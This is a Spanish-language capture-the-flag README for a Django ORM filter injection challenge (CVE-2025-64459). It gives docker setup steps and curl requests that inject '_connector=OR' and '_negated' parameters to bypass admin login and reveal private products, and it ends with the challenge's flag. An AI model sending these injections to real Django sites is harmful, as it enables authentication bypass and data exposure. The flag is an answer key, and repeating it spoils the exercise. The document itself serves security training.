
CTF challenge que demuestra la inyección en filtros del ORM de Django (CVE-2025-64459) con exploits de bypass de autenticación y bypass de filtros de productos, incluyendo el despliegue y la recuperación de la flag.
Categoría: Seguridad Web
Dificultad: Media
Vulnerabilidad: CVE-2025-64459 - Inyección en el filtro ORM de Django
Construimos una tienda de merchandising segura con panel de administración. ¿Puedes evadir la autenticación y encontrar la nota privada del administrador?
URL: http://YOUR_SERVER:6008
cd web_django_cve
docker-compose up --build -d
# Usando _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# Usando _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
# Negar el filtro is_public
curl "http://HOST:8054/?_negated=True"
# Acceso directo
curl "http://HOST:8054/?is_public=False"
lol-you-here_then-you_exploited_me